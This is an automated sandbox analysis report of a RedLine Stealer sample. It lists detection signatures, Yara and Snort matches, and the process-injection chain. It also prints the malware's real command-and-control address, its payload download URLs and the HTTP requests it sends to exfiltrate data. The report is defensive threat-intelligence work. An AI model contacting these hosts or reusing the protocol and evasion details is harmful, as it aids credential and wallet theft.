Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
StZAEFSb2j.exe

Overview

General Information

Sample Name:StZAEFSb2j.exe
Analysis ID:736967
MD5:c71616e2b7cedf9fc8e2ca6f6929abdf
SHA1:896a4c41792c73db51074ccff5ef3f0577f510c5
SHA256:4a9f8a3b847fa9d2e854d3a7235ddee8e4c093d04c3901f006d430be1060fae5
Tags:exeRedLineStealer
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Writes to foreign memory regions
Tries to steal Crypto Currency Wallets
.NET source code references suspicious native API functions
Uses known network protocols on non-standard ports
Machine Learning detection for sample
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Is looking for software installed on the system
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Contains functionality to detect virtual machines (SLDT)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • StZAEFSb2j.exe (PID: 780 cmdline: C:\Users\user\Desktop\StZAEFSb2j.exe MD5: C71616E2B7CEDF9FC8E2CA6F6929ABDF)
    • aspnet_compiler.exe (PID: 1592 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)
      • conhost.exe (PID: 6120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
{"C2 url": ["194.55.186.201:6008"], "Bot Id": "xxxPROFxxx"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_f54632ebunknownunknown
          • 0x535ca:$a4: get_ScannedWallets
          • 0x6b1ea:$a4: get_ScannedWallets
          • 0x52428:$a5: get_ScanTelegram
          • 0x6a048:$a5: get_ScanTelegram
          • 0x5324e:$a6: get_ScanGeckoBrowsersPaths
          • 0x6ae6e:$a6: get_ScanGeckoBrowsersPaths
          • 0x5106a:$a7: <Processes>k__BackingField
          • 0x68c8a:$a7: <Processes>k__BackingField
          • 0x4ef7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
          • 0x66b9c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
          • 0x5099e:$a9: <ScanFTP>k__BackingField
          • 0x685be:$a9: <ScanFTP>k__BackingField
          00000001.00000000.316565039.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            00000001.00000000.316565039.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 8 entries
              SourceRuleDescriptionAuthorStrings
              0.2.StZAEFSb2j.exe.42f9000.5.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                0.2.StZAEFSb2j.exe.42f9000.5.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  0.2.StZAEFSb2j.exe.42f9000.5.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                  • 0xe68a:$u7: RunPE
                  • 0x11d41:$u8: DownloadAndEx
                  • 0x7330:$pat14: , CommandLine:
                  • 0x11279:$v2_1: ListOfProcesses
                  • 0xe88b:$v2_2: get_ScanVPN
                  • 0xe92e:$v2_2: get_ScanFTP
                  • 0xf61e:$v2_2: get_ScanDiscord
                  • 0x1060c:$v2_2: get_ScanSteam
                  • 0x10628:$v2_2: get_ScanTelegram
                  • 0x106ce:$v2_2: get_ScanScreen
                  • 0x11416:$v2_2: get_ScanChromeBrowsersPaths
                  • 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths
                  • 0x11709:$v2_2: get_ScanBrowsers
                  • 0x117ca:$v2_2: get_ScannedWallets
                  • 0x117f0:$v2_2: get_ScanWallets
                  • 0x11810:$v2_3: GetArguments
                  • 0xfed9:$v2_4: VerifyUpdate
                  • 0x147f6:$v2_4: VerifyUpdate
                  • 0x11bca:$v2_5: VerifyScanRequest
                  • 0x112c6:$v2_6: GetUpdates
                  • 0x147d7:$v2_6: GetUpdates
                  0.2.StZAEFSb2j.exe.42f9000.5.unpackWindows_Trojan_RedLineStealer_f54632ebunknownunknown
                  • 0x117ca:$a4: get_ScannedWallets
                  • 0x10628:$a5: get_ScanTelegram
                  • 0x1144e:$a6: get_ScanGeckoBrowsersPaths
                  • 0xf26a:$a7: <Processes>k__BackingField
                  • 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
                  • 0xeb9e:$a9: <ScanFTP>k__BackingField
                  1.0.aspnet_compiler.exe.400000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                    Click to see the 7 entries
                    No Sigma rule has matched
                    Timestamp:192.168.2.48.8.8.856572532012811 11/03/22-12:44:38.337914
                    SID:2012811
                    Source Port:56572
                    Destination Port:53
                    Protocol:UDP
                    Classtype:Potentially Bad Traffic
                    Timestamp:50.115.174.192192.168.2.4443496952018856 11/03/22-12:44:39.556293
                    SID:2018856
                    Source Port:443
                    Destination Port:49695
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:50.115.174.192192.168.2.4443496962018856 11/03/22-12:44:40.820043
                    SID:2018856
                    Source Port:443
                    Destination Port:49696
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: StZAEFSb2j.exeReversingLabs: Detection: 34%
                    Source: StZAEFSb2j.exeVirustotal: Detection: 25%Perma Link
                    Source: https://tgc8x.tk/tt/BLACKDEV.txtAvira URL Cloud: Label: phishing
                    Source: https://tgc8x.tk/tt/lamb.txtAvira URL Cloud: Label: phishing
                    Source: StZAEFSb2j.exeJoe Sandbox ML: detected
                    Source: 00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: RedLine {"C2 url": ["194.55.186.201:6008"], "Bot Id": "xxxPROFxxx"}
                    Source: unknownHTTPS traffic detected: 50.115.174.192:443 -> 192.168.2.4:49695 version: TLS 1.2
                    Source: StZAEFSb2j.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\BLACKDEVIL.pdbBSJB source: StZAEFSb2j.exe, 00000000.00000002.322189785.0000000005000000.00000004.08000000.00040000.00000000.sdmp, StZAEFSb2j.exe, 00000000.00000002.321290507.0000000002C1B000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\BLACKDEVIL.pdb source: StZAEFSb2j.exe, 00000000.00000002.322189785.0000000005000000.00000004.08000000.00040000.00000000.sdmp, StZAEFSb2j.exe, 00000000.00000002.321290507.0000000002C1B000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: XCBVNDDJD.pdb source: StZAEFSb2j.exe
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h
                    Source: C:\Users\user\Desktop\StZAEFSb2j.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h

                    Networking

                    barindex
                    Source: TrafficSnort IDS: 2018856 ET TROJAN Windows executable base64 encoded 50.115.174.192:443 -> 192.168.2.4:49695
                    Source: TrafficSnort IDS: 2018856 ET TROJAN Windows executable base64 encoded 50.115.174.192:443 -> 192.168.2.4:49696
                    Source: TrafficSnort IDS: 2012811 ET DNS Query to a .tk domain - Likely Hostile 192.168.2.4:56572 -> 8.8.8.8:53
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 6008
                    Source: unknownNetwork traffic detected: HTTP traffic on port 6008 -> 49697
                    Source: unknownNetwork traffic detected: HTTP traffic on port 6008 -> 49697
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 6008
                    Source: unknownNetwork traffic detected: HTTP traffic on port 6008 -> 49697
                    Source: unknownNetwork traffic detected: HTTP traffic on port 6008 -> 49697
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 6008
                    Source: unknownNetwork traffic detected: HTTP traffic on port 6008 -> 49699
                    Source: unknownNetwork traffic detected: HTTP traffic on port 6008 -> 49699
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 6008
                    Source: unknownNetwork traffic detected: HTTP traffic on port 6008 -> 49700
                    Source: unknownNetwork traffic detected: HTTP traffic on port 6008 -> 49700
                    Source: Malware configuration extractorURLs: 194.55.186.201:6008
                    Source: Joe Sandbox ViewASN Name: VIRPUS VIRPUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: global trafficHTTP traffic detected: GET /tt/lamb.txt HTTP/1.1Host: tgc8x.tkConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /tt/BLACKDEV.txt HTTP/1.1Host: tgc8x.tk
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 194.55.186.201:6008Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 194.55.186.201:6008Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 194.55.186.201:6008Content-Length: 1129933Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 194.55.186.201:6008Content-Length: 1129925Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 50.115.174.192 50.115.174.192
                    Source: global trafficTCP traffic: 192.168.2.4:49697 -> 194.55.186.201:6008
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.55.186.201
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.55.186.201
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.55.186.201
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.55.186.201
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.55.186.201
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.55.186.201
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.55.186.201
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.55.186.201
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.55.186.201
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.55.186.201
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.55.186.201
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.55.186.201
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.55.186.201
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.55.186.201
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.55.186.201
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.55.186.201
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.55.186.201
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.55.186.201
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.55.186.201
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.55.186.201
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.55.186.201
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.55.186.201
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.55.186.201
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.55.186.201
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.55.186.201
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.55.186.201
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.55.186.201
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.55.186.201
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.55.186.201
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.55.186.201
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.55.186.201
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.55.186.201
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.55.186.201
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.55.186.201
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.55.186.201
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.55.186.201
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.55.186.201
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.55.186.201
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.55.186.201
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.55.186.201
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.55.186.201
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.55.186.201
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.55.186.201
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.55.186.201
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.55.186.201
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.55.186.201
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.55.186.201
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.55.186.201
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.55.186.201
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.55.186.201
                    Source: aspnet_compiler.exe, 00000001.00000002.416745991.00000000030DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.55.186.201:
                    Source: aspnet_compiler.exe, 00000001.00000002.415787658.0000000002FF2000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.55.186.201:6008
                    Source: aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.55.186.201:6008/
                    Source: aspnet_compiler.exe, 00000001.00000003.412663066.0000000008CB2000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000003.412625368.0000000008CB0000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000003.412575103.0000000008CB0000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000003.402236725.0000000008CA1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000003.412702825.000000000152D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.c/g
                    Source: aspnet_compiler.exe, 00000001.00000002.416441450.000000000309B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                    Source: aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                    Source: aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                    Source: aspnet_compiler.exe, 00000001.00000002.415555604.0000000002FAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/D
                    Source: aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                    Source: aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                    Source: aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                    Source: StZAEFSb2j.exe, 00000000.00000002.320164097.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                    Source: aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/0
                    Source: aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
                    Source: aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
                    Source: aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
                    Source: aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
                    Source: aspnet_compiler.exe, 00000001.00000002.415787658.0000000002FF2000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.415555604.0000000002FAF000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.415687042.0000000002FDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
                    Source: aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                    Source: aspnet_compiler.exe, 00000001.00000002.416745991.00000000030DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnviron
                    Source: aspnet_compiler.exe, 00000001.00000002.416745991.00000000030DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
                    Source: aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
                    Source: aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
                    Source: aspnet_compiler.exe, 00000001.00000002.414887349.0000000002F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
                    Source: aspnet_compiler.exe, 00000001.00000002.415555604.0000000002FAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/t_
                    Source: StZAEFSb2j.exe, 00000000.00000002.320604810.0000000002B5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tgc8x.tk
                    Source: tmpE2D.tmp.1.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: StZAEFSb2j.exe, 00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000000.316565039.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                    Source: StZAEFSb2j.exe, 00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000000.316565039.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
                    Source: tmpE2D.tmp.1.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: tmpE2D.tmp.1.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: aspnet_compiler.exe, 00000001.00000003.399325054.00000000080B1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.430638568.0000000004243000.00000004.00000800.00020000.00000000.sdmp, tmpB95.tmp.1.dr, tmpD30.tmp.1.dr, tmpC92.tmp.1.dr, tmpC33.tmp.1.dr, tmpCC2.tmp.1.dr, tmpDBF.tmp.1.dr, tmpBF4.tmp.1.dr, tmpEBC.tmp.1.dr, tmpE8C.tmp.1.dr, tmpF80C.tmp.1.dr, tmpD60.tmp.1.dr, tmpE2D.tmp.1.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: tmpE2D.tmp.1.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: StZAEFSb2j.exe, 00000000.00000002.321721404.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000000.316565039.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
                    Source: aspnet_compiler.exe, 00000001.00000003.399325054.00000000080B1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.430638568.0000000004243000.00000004.00000800.00020000.00000000.sdmp, tmpB95.tmp.1.dr, tmpD30.tmp.1.dr, tmpC92.tmp.1.dr, tmpC33.tmp.1.dr, tmpCC2.tmp.1.dr, tmpDBF.tmp.1.dr, tmpBF4.tmp.1.dr, tmpEBC.tmp.1.dr, tmpE8C.tmp.1.dr, tmpF80C.tmp.1.dr, tmpD60.tmp.1.dr, tmpE2D.tmp.1.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                    Source: aspnet_compiler.exe, 00000001.00000003.399325054.00000000080B1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.430638568.0000000004243000.00000004.00000800.00020000.00000000.sdmp, tmpB95.tmp.1.dr, tmpD30.tmp.1.dr, tmpC92.tmp.1.dr, tmpC33.tmp.1.dr, tmpCC2.tmp.1.dr, tmpDBF.tmp.1.dr, tmpBF4.tmp.1.dr, tmpEBC.tmp.1.dr, tmpE8C.tmp.1.dr, tmpF80C.tmp.1.dr, tmpD60.tmp.1.dr, tmpE2D.tmp.1.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
                    Source: aspnet_compiler.exe, 00000001.00000003.399325054.00000000080B1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.430638568.0000000004243000.00000004.00000800.00020000.00000000.sdmp, tmpB95.tmp.1.dr, tmpD30.tmp.1.dr, tmpC92.tmp.1.dr, tmpC33.tmp.1.dr, tmpCC2.tmp.1.dr, tmpDBF.tmp.1.dr, tmpBF4.tmp.1.dr, tmpEBC.tmp.1.dr, tmpE8C.tmp.1.dr, tmpF80C.tmp.1.dr, tmpD60.tmp.1.dr, tmpE2D.tmp.1.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
                    Source: aspnet_compiler.exe, 00000001.00000003.399325054.00000000080B1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.430638568.0000000004243000.00000004.00000800.00020000.00000000.sdmp, tmpB95.tmp.1.dr, tmpD30.tmp.1.dr, tmpC92.tmp.1.dr, tmpC33.tmp.1.dr, tmpCC2.tmp.1.dr, tmpDBF.tmp.1.dr, tmpBF4.tmp.1.dr, tmpEBC.tmp.1.dr, tmpE8C.tmp.1.dr, tmpF80C.tmp.1.dr, tmpD60.tmp.1.dr, tmpE2D.tmp.1.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
                    Source: StZAEFSb2j.exe, 00000000.00000002.320164097.0000000002B46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tgc8x.tk
                    Source: StZAEFSb2j.exe, 00000000.00000002.318741873.0000000002ACA000.00000004.00000800.00020000.00000000.sdmp, StZAEFSb2j.exe, 00000000.00000002.321171028.0000000002BC4000.00000004.00000800.00020000.00000000.sdmp, StZAEFSb2j.exe, 00000000.00000002.318500513.0000000002ABD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tgc8x.tk/tt/BLACKDEV.txt
                    Source: StZAEFSb2j.exe, 00000000.00000002.318741873.0000000002ACA000.00000004.00000800.00020000.00000000.sdmp, StZAEFSb2j.exe, 00000000.00000002.318500513.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, StZAEFSb2j.exe, 00000000.00000002.320164097.0000000002B46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tgc8x.tk/tt/lamb.txt
                    Source: StZAEFSb2j.exe, 00000000.00000002.320562361.0000000002B54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tgc8x.tk4
                    Source: StZAEFSb2j.exe, 00000000.00000002.321171028.0000000002BC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tgc8x.tkD8
                    Source: aspnet_compiler.exe, 00000001.00000003.399325054.00000000080B1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.430638568.0000000004243000.00000004.00000800.00020000.00000000.sdmp, tmpB95.tmp.1.dr, tmpD30.tmp.1.dr, tmpC92.tmp.1.dr, tmpC33.tmp.1.dr, tmpCC2.tmp.1.dr, tmpDBF.tmp.1.dr, tmpBF4.tmp.1.dr, tmpEBC.tmp.1.dr, tmpE8C.tmp.1.dr, tmpF80C.tmp.1.dr, tmpD60.tmp.1.dr, tmpE2D.tmp.1.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 194.55.186.201:6008Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: unknownDNS traffic detected: queries for: tgc8x.tk
                    Source: global trafficHTTP traffic detected: GET /tt/lamb.txt HTTP/1.1Host: tgc8x.tkConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /tt/BLACKDEV.txt HTTP/1.1Host: tgc8x.tk
                    Source: unknownHTTPS traffic detected: 50.115.174.192:443 -> 192.168.2.4:49695 version: TLS 1.2

                    System Summary

                    barindex
                    Source: 0.2.StZAEFSb2j.exe.42f9000.5.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.StZAEFSb2j.exe.42f9000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 1.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 1.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
